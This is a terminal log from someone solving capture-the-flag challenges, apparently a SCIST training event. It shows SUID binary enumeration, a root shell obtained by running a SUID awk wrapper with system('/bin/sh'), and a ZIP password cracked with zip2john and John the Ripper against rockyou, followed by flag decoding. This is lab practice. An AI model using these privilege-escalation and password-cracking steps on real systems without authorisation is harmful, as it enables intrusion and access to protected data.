┌──(ldn970110㉿LDNsKali)-[~]
└─$ nc 靶機
=== Rev-Only Challenge ===
Flag is in /flag. Find a way to read it.
root@7d99e433d724:/$ rev /flag
}trats_egassem_siht_ver{TSICS
root@7d99e433d724:/$ rev /flag | rev
SCIST{rev_this_message_start}
root@7d99e433d724:/$ 

ctfuser@80f752e94032:~$

ctfuser@80f752e94032:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/gpasswd
... (其他標準 SUID 檔案)
/usr/bin/awkrunner

/usr/bin/awkrunner 'BEGIN { system("/bin/sh") }'

┌──(ldn970110㉿LDNsKali)-[~/文件]
└─$ zip2john /home/ldn970110/文件/SCIST.zip > /home/ldn970110/文件/scist.hash

┌──(ldn970110㉿LDNsKali)-[~/文件]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt /home/ldn970110/文件/scist.hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
┌──(ldn970110㉿LDNsKali)-[~/文件]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt /home/ldn970110/文件/scist.hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 114987 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 4.17% (ETA: 16:12:22) 0g/s 125068p/s 125068c/s 125068C/s grass9..blah2007
... (破解中) ...
0g 0:00:00:13 10.48% (ETA: 16:12:27) 0g/s 124215p/s 124215c/s 124215C/s karenkim..jhvguyh
fascist        (SCIST.zip/SCIST.pdf)     
1g 0:00:00:14 DONE (2025-10-28 16:10) 0.06747g/s 123819p/s 123819c/s 123819C/s fish2133..efer05
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(ldn970110㉿LDNsKali)-[~/文件]
└─$ echo -n "U0NJU1R7ejFwX2NyNGNrM2RfbTN0YV9sM2FrfQ==" | base64 -d
SCIST{z1p_cr4ck3d_m3ta_l3ak}